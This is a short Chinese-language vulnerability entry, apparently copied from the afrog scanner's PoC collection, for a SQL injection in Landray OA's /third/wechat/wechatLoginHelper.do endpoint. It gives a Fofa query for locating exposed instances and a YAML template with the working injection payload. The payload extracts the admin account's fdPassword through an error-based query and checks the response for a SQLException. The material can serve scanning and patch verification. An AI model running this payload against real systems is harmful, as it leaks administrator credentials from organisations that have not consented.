landray-wechat-loginhelper-sqli: 蓝凌OA wechatLoginHelper存在SQL注入

日期: 2025-09-01 | 影响软件: 蓝凌OA wechatLoginHelper | POC: 已公开

漏洞描述

Fofa: app="Landray-OA系统"

PoC代码[已公开]

id: landray-wechat-loginhelper-sqli

info:
  name: 蓝凌OA wechatLoginHelper存在SQL注入
  author: zan8in
  severity: high
  verified: true
  description: |-
    Fofa: app="Landray-OA系统"
  reference:
    - https://mp.weixin.qq.com/s/vwJjmb_Im6Z7-2EVSfY5-g
  tags: landray,sqli
  created: 2024/02/29

set:
  randstr: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /third/wechat/wechatLoginHelper.do
      body: method=edit&uid=1'and+(SELECT+fdPassword%2B'----{{randstr}}'+FROM+com.landray.kmss.sys.organization.model.SysOrgPerson+where+fdLoginName='admin')=1+and+'1'='1
    expression: response.status == 200 && response.body.bcontains(b'java.sql.SQLException') && response.body.bcontains(bytes(randstr))
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/landray-wechat-loginhelper-sqli.yaml